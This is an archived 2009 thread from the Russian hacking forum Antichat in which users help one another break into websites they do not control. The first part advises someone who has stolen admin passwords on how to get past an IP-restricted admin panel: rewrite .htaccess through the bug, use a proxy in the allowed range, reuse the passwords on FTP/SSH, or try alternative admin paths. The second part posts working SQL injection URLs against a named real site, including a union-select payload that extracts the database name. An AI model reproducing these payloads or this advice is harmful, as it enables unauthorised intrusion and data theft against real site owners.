ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.04.2009, 17:08
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
2MurZeg
Если есть права, можно записать в .htaccess с их ипами, свой.
|
|
|
30.04.2009, 22:24
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
38649
Репутация:
1
|
|
Если есть права, можно записать в .htaccess с их ипами, свой.
А каким образом не подчкажеш?
|
|
|
|
30.04.2009, 22:34
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Самым прямым способом - через шелл например которого как я понял у тебя нету или ftp доступ которого по всей видимости у тебя тоже нету так что на этот можешь даже и не расчитывать.
|
|
|
|
30.04.2009, 22:55
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
MurZeg
Если доступ в админку закрыт по IP то никак ты туда не попадёшь, кроме как с разрешённых айпишников.
-m0rgan-
Как всегда в своём репертуаре.
Мне интересно, ты сам как думаешь, если бы у него был доступ на запись .htaccess нахрена ему было-бы задавать тут эти вопросы и вообще ломиться в админку?
|
|
|
|
30.04.2009, 23:32
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
38649
Репутация:
1
|
|
Мда плохи дела... Всем спасибо за ответ
|
|
|
|
30.04.2009, 23:35
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
2jokester
Иему нужен доступ в админку, на вход в акминку стоин ограничение по ипу по определённому диамозону, ИМХО.
Он нашол баг и получил пароли, но в админку зайти не может.
Ну почему бы ему не заюзать данный баг для получения доступа к .htaccess ?
Меня не посвещали, для чего ему нужен доступ в админ панель.
Возможно я ошибаюсь, но это моё личное мнение...
Последний раз редактировалось -m0rgan-; 30.04.2009 в 23:47..
|
|
|
|
01.05.2009, 17:58
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
2MurZeg, попробуй поискать прокси, который подходит по данному диапазону (если ты его знаешь) - уже выручал такое =)
А вообще, можешь тупо попробовать данный пасс к ФТП\ССХ и прочим...
====
Ещё кстати вариант, тож встречался. Когда в Файле htaccess стоит ограницение по ИП только к Одному файлу, к примеру /admin/index.php, а ты попробуй прописать, к примеру /admin/admin.php и есть вероятность, что проканает
(это в случае если ещё и админка так реализована)
Последний раз редактировалось o3,14um; 01.05.2009 в 18:01..
|
|
|
|
02.05.2009, 00:08
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,2,3,4,5--
При выявлении database() ниче не выскакивает (отчет о ошибках выключен я так пологаю) что делать?
|
|
|
|
02.05.2009, 00:17
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
unhex(hex(concat_ws(0x3a,)))
http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,database ()))),3,4,5--+
|
|
|
|
02.05.2009, 01:12
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
concat_ws(0x3a
в данном случае не нужен, используется только для вывода НЕСКОЛЬКИХ данных подряд, user  ass:mail например
если только один параметр надо выцепить - то просто лишний оператор, иногда имеет значение при ограничении длины запроса |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1253959){kind=avatar}
Похожие темы
Линейный вид
